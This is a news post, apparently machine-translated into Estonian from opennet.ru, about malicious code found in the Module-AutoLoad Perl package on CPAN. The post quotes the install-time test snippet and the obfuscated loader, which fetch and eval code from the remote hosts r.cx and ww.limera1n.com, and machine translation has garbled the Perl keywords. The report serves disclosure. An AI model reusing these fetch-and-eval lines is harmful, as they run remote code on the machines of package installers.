ProHoster > Blogi > internetiuudised > Module-AutoLoad Perli paketist leiti pahatahtlik kood

Module-AutoLoad Perli paketist leiti pahatahtlik kood

Perli paketis, mida levitatakse CPAN-kataloogi kaudu Moodul-AutoLoad, mis on loodud CPAN-moodulite automaatseks laadimiseks lennult, tuvastatud pahatahtlik kood. Pahatahtlik sisestus oli leitud testi koodis 05_rcx.t, mis on tarnitud alates 2011. aastast.
Tähelepanuväärne on, et küsimused küsitava koodi laadimise kohta tekkisid Stackoverflow tagasi aastal 2016.

Pahatahtlik tegevus taandub katsele laadida alla ja käivitada kood kolmanda osapoole serverist (http://r.cx:1/) mooduli installimisel käivitatud testkomplekti täitmise ajal. Eeldatakse, et algselt välisest serverist alla laaditud kood ei olnud pahatahtlik, kuid nüüd suunatakse päring ümber domeenile ww.limera1n.com, mis annab täitmiseks oma osa koodist.

Allalaadimise korraldamiseks failis 05_rcx.t Kasutatakse järgmist koodi:

minu $programm = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
minu $proovi = `$^X $prog`;

Määratud kood käivitab skripti ../contrib/RCX.pl, mille sisu on taandatud reale:

kasuta lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

See skript laaditakse segaduses teenust kasutades perlobfuscator.com kood välisest hostist r.cx (märgikoodid 82.46.99.88 vastavad tekstile "R.cX") ja käivitab selle eval plokis.

$ perl -MIO::Socket -e'$b=uus IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval lahti pakkida u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Pärast lahtipakkimist teostatakse lõpuks järgmine: kood:

print{$b=uus IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Probleemne pakett on nüüd hoidlast eemaldatud. PAUSE (Perl Authors Upload Server) ja mooduli autori konto on blokeeritud. Sel juhul jääb moodul ikkagi alles saadaval MetaCPANi arhiivis ja seda saab otse installida MetaCPANist, kasutades mõnda utiliiti, näiteks cpanminus. Märgitakseet pakk ei olnud laialt levinud.

Huvitav arutada ühendatud ja mooduli autor, kes eitas teavet selle kohta, et pärast tema saidi "r.cx" sissemurdmist on sisestatud pahatahtlikku koodi, ja selgitas, et tal oli lihtsalt lõbus, ning kasutas perlobfuscator.com-i mitte millegi varjamiseks, vaid selle suuruse vähendamiseks. koodi ja selle kopeerimise lihtsustamine lõikelaua kaudu. Funktsiooni nime "botstrap" valik on seletatav asjaoluga, et see sõna "kõlab nagu bot ja on lühem kui bootstrap". Mooduli autor kinnitas ka, et tuvastatud manipulatsioonid ei tee pahatahtlikke toiminguid, vaid demonstreerivad ainult koodi laadimist ja täitmist TCP kaudu.

Allikas: opennet.ru

Lisa kommentaar